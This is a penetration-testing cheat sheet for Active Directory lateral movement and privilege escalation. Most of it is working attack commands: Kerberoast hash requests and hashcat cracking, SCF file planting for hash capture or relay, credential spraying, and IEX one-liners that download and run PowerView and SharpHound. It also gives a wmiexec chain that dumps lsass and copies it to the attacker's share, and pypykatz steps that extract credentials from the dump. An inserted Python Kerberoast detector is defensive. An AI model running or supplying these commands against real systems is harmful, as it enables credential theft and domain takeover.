6 - Lateral-Movement-and-Privilege-Escalation.md

File metadata and controls

98 lines (49 loc) · 3.32 KB

Kerberoast

From Linux:

Get hashes using impacket

GetUserSPNs.py -request -save -dc-ip <IP> domain/user

From Windows:

RiskySPN: https://github.com/cyberark/RiskySPN

Crack:

Hashcat:

hashcat -m 13100 -r rules/<rule> <hashes file> wordlists/<wordlist>
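Detection counterpart for the Kerberoast section above, added here as an example and not part of the original notes: a TGS request burst from one account for several distinct user-account SPNs with RC4-HMAC (0x17) tickets is the usual footprint of GetUserSPNs.py -request. The 4769 records below are constructed samples; the field names and thresholds are assumptions to tune per environment.

```python
"""Flag probable Kerberoasting from Windows Security event 4769 (TGS request) records.
Heuristic: one account requests RC4-HMAC (0x17) service tickets for at least
`min_spns` distinct non-computer SPN accounts within `window`.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType used by default Kerberoast tooling

# Constructed sample events: (timestamp, requesting account, ServiceName, TicketEncryptionType)
SAMPLE_4769 = [
    ("2024-03-01T09:00:01", "jdoe@CORP.LOCAL", "svc_sql", "0x17"),
    ("2024-03-01T09:00:02", "jdoe@CORP.LOCAL", "svc_web", "0x17"),
    ("2024-03-01T09:00:02", "jdoe@CORP.LOCAL", "svc_backup", "0x17"),
    ("2024-03-01T09:00:03", "jdoe@CORP.LOCAL", "svc_report", "0x17"),
    ("2024-03-01T09:00:03", "jdoe@CORP.LOCAL", "svc_mon", "0x17"),
    ("2024-03-01T09:05:00", "asmith@CORP.LOCAL", "FILESERVER01$", "0x12"),  # AES, benign
    ("2024-03-01T09:06:00", "asmith@CORP.LOCAL", "svc_sql", "0x12"),
    ("2024-03-01T10:00:00", "bjones@CORP.LOCAL", "svc_legacy", "0x17"),  # single legacy SPN
]


def find_kerberoast_candidates(events, min_spns=4, window=timedelta(minutes=5)):
    """Return {account: sorted SPN accounts} for accounts matching the heuristic."""
    per_account = defaultdict(list)
    for ts, account, service, etype in events:
        # Computer accounts ($) have long random passwords and are not crackable targets;
        # only RC4 tickets for user-account SPNs count toward the threshold.
        if etype != RC4_HMAC or service.endswith("$"):
            continue
        per_account[account].append((datetime.fromisoformat(ts), service))

    hits = {}
    for account, reqs in per_account.items():
        reqs.sort()
        # Slide a window starting at each request; stop at the first one that trips the threshold.
        for i, (start, _) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(spns) >= min_spns:
                hits[account] = sorted(spns)
                break
    return hits


if __name__ == "__main__":
    for account, spns in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"possible Kerberoast by {account}: {', '.join(spns)}")
```

On a real DC, feed the same function the 4769 fields from the Security log and lower the threshold for accounts that never request RC4 tickets in normal use.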

Plant SCF files on file shares to get hashes or SMB relay

Find shares:

Invoke-ShareFinder

powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder"

CrackMapExec --shares module, grep output for WRITE.

Plant an SCF file on a writable share using the cme --scuffy module.

Use Metasploit SMB server module or Responder to capture/crack or relay hashes.

Spray creds for admin access using CrackMapExec

cme smb [/path/to/FileWithIPsOrNetworks] -u [username] -p [password] | tee /path/to/logfile.log

Note: If using a local account, add the --local-auth option. If using a hash instead of password, use -H [hash] instead of -p.

PowerView

Invoke-UserHunter

All Domain Admins:

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-UserHunter -CheckAccess

Single User:

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-UserHunter -UserName <username> -CheckAccess

Invoke-ShareFinder

powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder"

Find all members of a group

powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-UserHunter -GroupName <group>"

BloodHound

Installation and walkthrough

https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/

Collection

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-Bloodhound -CollectionMethod all

PrivExchange

Exchange your privileges for Domain Admin privs by abusing Exchange: https://github.com/dirkjanm/privexchange/

Find Domain Admin sessions and dump credentials

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-UserHunter -CheckAccess

Note: I don't use Mimikatz on production systems. I dump lsass.exe and use Mimikatz on a system that I control to dump creds from the dump file.

Requires Impacket and pypykatz

Install pypykatz:

pip3 install pypykatz

Run Impacket smbserver.py:

./smbserver.py <share name> <path to directory where you have procdump64.exe>

Run Impacket wmiexec.py:

./wmiexec.py <domain>/<username>:<password>@<Victim IP> 'copy \\<PTK IP>\<share>\procdump64.exe . & procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp & copy lsass.dmp \\<PTK IP>\<share>\ & del lsass.dmp & del procdump64.exe'

Dump credentials from lsass dump file

pypykatz minidump lsass.dmp

Note: Sometimes you may get an error when using pypykatz. In that case you'll have to copy the dump file to a Windows system under your control and use Mimikatz.